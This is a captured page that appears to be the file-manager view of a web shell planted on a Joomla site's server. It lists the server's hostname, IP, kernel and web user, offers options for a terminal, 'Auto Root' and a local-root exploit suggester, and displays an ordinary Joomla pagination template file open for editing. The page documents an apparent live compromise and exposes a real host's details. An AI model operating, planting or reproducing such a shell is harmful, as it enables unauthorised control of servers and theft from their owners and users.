Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
templates /
vriendennsm_allerta /
html /
Delete
Unzip
Name
Size
Permission
Date
Action
com_contact
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
com_content
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
com_search
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
com_tags
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
com_users
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
com_xmap
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
layouts
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_breadcrumbs
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_custom
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_formmaker
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_login
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_menu
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
mod_search
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
index.html
44
B
-rwxr-xr-x
2018-04-20 12:55
modules.php
862
B
-rwxr-xr-x
2018-04-20 12:55
pagination.php
3.21
KB
-rwxr-xr-x
2018-04-20 12:55
Save
Rename
<?php /** * @version $Id: pagination.php 10381 2008-06-01 03:35:53Z pasamio $ * @package Joomla * @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // no direct access defined('_JEXEC') or die('Restricted access'); /** * This is a file to add template specific chrome to pagination rendering. * * pagination_list_footer * Input variable $list is an array with offsets: * $list[limit] : int * $list[limitstart] : int * $list[total] : int * $list[limitfield] : string * $list[pagescounter] : string * $list[pageslinks] : string * * pagination_list_render * Input variable $list is an array with offsets: * $list[all] * [data] : string * [active] : boolean * $list[start] * [data] : string * [active] : boolean * $list[previous] * [data] : string * [active] : boolean * $list[next] * [data] : string * [active] : boolean * $list[end] * [data] : string * [active] : boolean * $list[pages] * [{PAGE}][data] : string * [{PAGE}][active] : boolean * * pagination_item_active * Input variable $item is an object with fields: * $item->base : integer * $item->link : string * $item->text : string * * pagination_item_inactive * Input variable $item is an object with fields: * $item->base : integer * $item->link : string * $item->text : string * * This gives template designers ultimate control over how pagination is rendered. * * NOTE: If you override pagination_item_active OR pagination_item_inactive you MUST override them both */ function pagination_list_footer($list) { $html = "<div class=\"list-footer\">\n"; $html .= "\n<div class=\"limit\">".JText::_('Display Num').$list['limitfield']."</div>"; $html .= $list['pageslinks']; $html .= "\n<div class=\"counter\">".$list['pagescounter']."</div>"; $html .= "\n<input type=\"hidden\" name=\"limitstart\" value=\"".$list['limitstart']."\" />"; $html .= "\n</div>"; return $html; } function pagination_list_render($list) { // Initialize variables $lang =& JFactory::getLanguage(); $html = "<div class=\"pagination\"><ul>"; $html .= $list['start']['data']; $html .= $list['previous']['data']; foreach( $list['pages'] as $page ) { if($page['data']['active']) { // $html .= '<strong>'; } $html .= $page['data']; if($page['data']['active']) { // $html .= '</strong>'; } } $html .= $list['next']['data']; $html .= $list['end']['data']; // $html .= '«'; $html .= "</ul></div>"; return $html; } function pagination_item_active(&$item) { return "<li><a href=\"".$item->link."\" title=\"".$item->text."\">".$item->text."</a></li>"; } function pagination_item_inactive(&$item) { return "<li class=\"disabled\"><a href=\"#\">".$item->text."</a></li>"; } ?>